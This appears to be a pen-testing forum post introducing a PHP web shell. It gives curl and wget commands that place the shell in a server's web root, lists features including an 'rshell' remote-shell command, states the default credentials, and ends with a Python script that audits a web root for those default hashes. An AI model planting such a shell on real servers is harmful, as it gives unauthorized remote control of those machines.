Sooo, I am getting a bit exhausted with people’s reverse shells crashing boxes (also shuffling through them to find one that works). Here is a nice web shell that gives you a terminal-like page to execute basic commands from. It’s not a TRUE reverse shell but it is good enough for most of the things you will do here at least. Enjoy.
A simple, intuitive, feature-rich PHP web shell for pen testing.
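To download, use one of the following (or similar):
```
# -L follows the redirect GitHub issues for /raw/ URLs
curl -L https://github.com/eb3095/php-shell/raw/master/php-shell.php > /var/www/html/php-shell.php
# -O needs a file path, not a directory
wget https://github.com/eb3095/php-shell/raw/master/php-shell.php -O /var/www/html/php-shell.php
```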
From there, just visit the website with /php-shell.php at the end and enjoy your web-based shell from the host!
- Arrow Up: History up
- Arrow Down: History down
- Enter: Run command
- Click Anywhere: Focus command prompt
History is not saved across sessions and is stored locally in the browser for the time being.
- exit: Log out
- cd: Change directory
- cls: Clear the screen
- rshell: “rshell IP PORT” open a remote shell to the specified address
- upload: Shows a file prompt then uploads the file to the current directory
- download: Download a file either relative path or full. “download FILE”
cd is unique here. If you do the following,
```
cd /home; ls
```
this will be executed as a SH/BASH command. The cd will not set the current working directory outside of the exec. However, a cd entered on its own as the command will be executed as an internal command, setting the PHP cwd, and it is permanent (until refresh).
The defaults are,
- Username: user
- Password: pass
The username and password are both hashed with SHA-512 and set directly in the file.
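Because the credentials live in the file as hashes, a copy left with the defaults can be spotted by searching a web root for the SHA-512 digests of "user" and "pass". The following is an added example, not code from the php-shell project; it assumes the hashes are stored as unsalted hex literals, and the sample files and PHP variable names in it are constructed.

```python
import hashlib
import re
import tempfile
from pathlib import Path

# Default credentials as stated on this page.
DEFAULTS = {"username": "user", "password": "pass"}

def sha512_hex(value: str) -> str:
    return hashlib.sha512(value.encode()).hexdigest()

# Assumption: the file stores unsalted SHA-512 digests as 128 hex characters.
DEFAULT_DIGESTS = {sha512_hex(v): field for field, v in DEFAULTS.items()}
HEX128 = re.compile(r"(?<![0-9a-fA-F])[0-9a-fA-F]{128}(?![0-9a-fA-F])")

def audit_file(path: Path) -> dict:
    """Report SHA-512-sized literals in one file and which defaults they match."""
    text = path.read_text(errors="replace")
    found = [m.group(0).lower() for m in HEX128.finditer(text)]
    matched = sorted({DEFAULT_DIGESTS[d] for d in found if d in DEFAULT_DIGESTS})
    return {"path": str(path), "sha512_literals": len(found), "default_fields": matched}

def audit_tree(root: Path) -> list:
    """Audit every .php file under root; keep only files that embed such literals."""
    results = [audit_file(p) for p in sorted(root.rglob("*.php"))]
    return [r for r in results if r["sha512_literals"]]

def demo() -> list:
    """Run the audit over a constructed web root (hypothetical file contents)."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "default.php").write_text(
            f"<?php $u='{sha512_hex('user')}'; $p='{sha512_hex('pass')}';")
        (root / "changed.php").write_text(
            f"<?php $u='{sha512_hex('user')}'; $p='{sha512_hex('constructed-long-passphrase')}';")
        (root / "index.php").write_text("<?php echo 'hello';")
        return [(Path(r["path"]).name, r["default_fields"]) for r in audit_tree(root)]

if __name__ == "__main__":
    for name, fields in demo():
        print(f"{name}: default credentials still set for {fields or 'nothing'}")
```

Point `audit_tree` at a real document root to list files that still carry a default username or password hash; any hit with `password` in `default_fields` is a shell anyone can log in to.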